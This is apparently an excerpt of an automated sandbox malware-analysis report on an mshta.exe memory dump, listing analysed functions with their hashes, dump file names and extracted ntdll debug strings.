                • Instruction Fuzzy Hash: 57510475A00645AEDB30DE9CC99097FBBF9EF44240B408469FADAD3641EBF4DA40CB60
                Function 02EC7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                Download Yara Rule
                Strings
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F04655
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F04725
                • ExecuteOptions, xrefs: 02F046A0
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F04787
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F04742
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F046FC
                • Execute=1, xrefs: 02F04713
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: 4c93b56f3cf77f8937364d9291aa913b4ecf9607f599bb52e18c91770b49e3bb
                • Instruction ID: 27fa73fe040d8a991f601803319c8a9269bcf3cf8612288a8155855fb3ea1e37
                • Opcode Fuzzy Hash: 4c93b56f3cf77f8937364d9291aa913b4ecf9607f599bb52e18c91770b49e3bb
                • Instruction Fuzzy Hash: C0511731A8031D6AEF10AAE4DD95BE9B3ADEF04345F2450ADE609AB1C0E7709A42CF50
                Function 02F66940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction ID: f2269e13b965f2cc73a14bb9d4ab676005fe78d55d16a05e083ce9b6ee95d7df
                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction Fuzzy Hash: E4022671508341AFC304DF18C998A6BBBEAEFC8744F048A6DFA859B254DB35E945CF42
                Function 02EDB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: 40bd4ed188e1ef2c903a27ade5a679c38864af08959da19f07b5bd10c8f99ce6
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: 2181B278EC52499BDF248E68C4507FEBBA2AF4535CF1AE25DE861A72D0E7348442CB50
                Function 02F420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: e2863ddc1429ed09d27c9514ecad2b03bd7674c56286b3b2e0d8ef7368f13047
                • Instruction ID: d1a66a21c9193b0a74fa9a8a64854bb3198b621a0ee4ed3af91f8eee1272d310
                • Opcode Fuzzy Hash: e2863ddc1429ed09d27c9514ecad2b03bd7674c56286b3b2e0d8ef7368f13047
                • Instruction Fuzzy Hash: 0F215676E001199BEB10DF69CC40AEFBBE9AF94784F044126FE45E3200EB70D901CBA1
                Function 02EBF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                Download Yara Rule
                Strings
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F002E7
                • RTL: Re-Waiting, xrefs: 02F0031E
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F002BD
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: efed3e48df276f81e71a9c44a7aeb3f4e17c15e1be737571822c4648c58301d7
                • Instruction ID: 8692e21b4d649c3eda82f8c43cdc45ae3353df290fbd1e7e8146330a7f084c2e
                • Opcode Fuzzy Hash: efed3e48df276f81e71a9c44a7aeb3f4e17c15e1be737571822c4648c58301d7
                • Instruction Fuzzy Hash: 8BE1F230648741DFD726CF28C884BAAB7E1BF48358F149A5DF5A58BAD0DB74D844CB42
                Function 02ECBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                Download Yara Rule
                Strings
                • RTL: Re-Waiting, xrefs: 02F07BAC
                • RTL: Resource at %p, xrefs: 02F07B8E
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F07B7F
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: c94662069725169804cbade1d965f360e8eba35baf7b9d4cbcc6e3478ad7db21
                • Instruction ID: bb1d25d9ed3120219ca97cac91294cf45e482b8e1225f9b1aeda06e2a34dd3a4
                • Opcode Fuzzy Hash: c94662069725169804cbade1d965f360e8eba35baf7b9d4cbcc6e3478ad7db21
                • Instruction Fuzzy Hash: 694101317807428FD724DE25CD41B6AB7E6EF88718F105A1DF95A9B780DB30E8068F91
                Function 02ECB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F0728C
                Strings
                • RTL: Re-Waiting, xrefs: 02F072C1
                • RTL: Resource at %p, xrefs: 02F072A3
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F07294
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: 200dc4f94fc628acca0fd7d4d4d3fd78a383f7c070c433ae6c63ad51443b02ce
                • Instruction ID: af767c96c2420102ef9af438fe3774b892b0df6b8834b3002ce640d7a97ac90e
                • Opcode Fuzzy Hash: 200dc4f94fc628acca0fd7d4d4d3fd78a383f7c070c433ae6c63ad51443b02ce
                • Instruction Fuzzy Hash: E9412231B44242ABD720EE64CC81B66B3A6FF58758F20465CFA55EB280DB30F802DBD0
                Function 02F42300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: 3e3f5a995d1c0ebedce7f9a2d9642d875d3a6fad092e1e72135be101a50e4ad7
                • Instruction ID: 11880900db8c4597130078fbf8f3746de31df9d8d3bf845f94c372d7204f5cd4
                • Opcode Fuzzy Hash: 3e3f5a995d1c0ebedce7f9a2d9642d875d3a6fad092e1e72135be101a50e4ad7
                • Instruction Fuzzy Hash: 60315472A006199FDB20DF29DC40BFEBBB9EB44654F444565FD49E3240EF709A458FA0
                Function 031B038E Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4607115675.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_31b0000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: iq$iq$iq$iq$iq
                • API String ID: 0-718299175
                • Opcode ID: 711543e218ceafe5d13385c83b04562454eede7462914baf69931a9415a317cb
                • Instruction ID: 3d577c278c1fa27baf160cb9cf1dd69250b8fbf68c91175d49a777f4d922e9c2
                • Opcode Fuzzy Hash: 711543e218ceafe5d13385c83b04562454eede7462914baf69931a9415a317cb
                • Instruction Fuzzy Hash: 5E215731808B4DCFCF44EFA4C8856EEBBB0FB68300F40012AD909E7252D7359A45CB92
                Function 031B0398 Relevance: 6.3, Strings: 5, Instructions: 74COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4607115675.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_31b0000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: iq$iq$iq$iq$iq
                • API String ID: 0-718299175
                • Opcode ID: 5e3cf42a709f8cb8da0dd28dc1ee9d6b5b357e8460c252dbe12edff236344b2a
                • Instruction ID: 2a547339746b68c57fbb13a01c7a4ec0b9aa7c2dae9b8bd25a44a7f7eba11e1e
                • Opcode Fuzzy Hash: 5e3cf42a709f8cb8da0dd28dc1ee9d6b5b357e8460c252dbe12edff236344b2a
                • Instruction Fuzzy Hash: 58214531808B4DCFCF84EFA4C8856EEBBB0FB28300F40012AD909E7251D7348A44CBA2
                Function 02ED7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: cd668ce85ee8684dd8f187ced9720b7b60d0ea94aa51067f78c207d3de4682cb
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 9591A170E802169ADB34DF6AC8817BEF7A5AF45728F54E61AEC55EB2C0D7308943CB50
                Function 02E99126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: 1e5323894c764c93f13a6165126f2ad70e6b00b2af36e22826b602ee9fdba757
                • Instruction ID: 91b5476270ef34728a06d6ef76ad754cca990fe097c1014cd756bf403e3e5c86
                • Opcode Fuzzy Hash: 1e5323894c764c93f13a6165126f2ad70e6b00b2af36e22826b602ee9fdba757
                • Instruction Fuzzy Hash: AC812A71D402699BDB35CB54CC44BEEB7B8AF08754F0191EAEA09B7240E7309E84CFA0
                Function 02F1CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                Download Yara Rule
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 02F1CFBD
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: e45ccb36a3a60d78400cb4a358d99120e79eb45ec7d4889a7008afef04d546fc
                • Instruction ID: f7fcfa17b9f05ac49da73ecf0973d51538b5feb250e34c2b7f7a2963907acb6c
                • Opcode Fuzzy Hash: e45ccb36a3a60d78400cb4a358d99120e79eb45ec7d4889a7008afef04d546fc
                • Instruction Fuzzy Hash: 2E417C71E40218DFDB219FA5C940AAEFBB9EF44B84F00856AEA15DB264D734D801CF61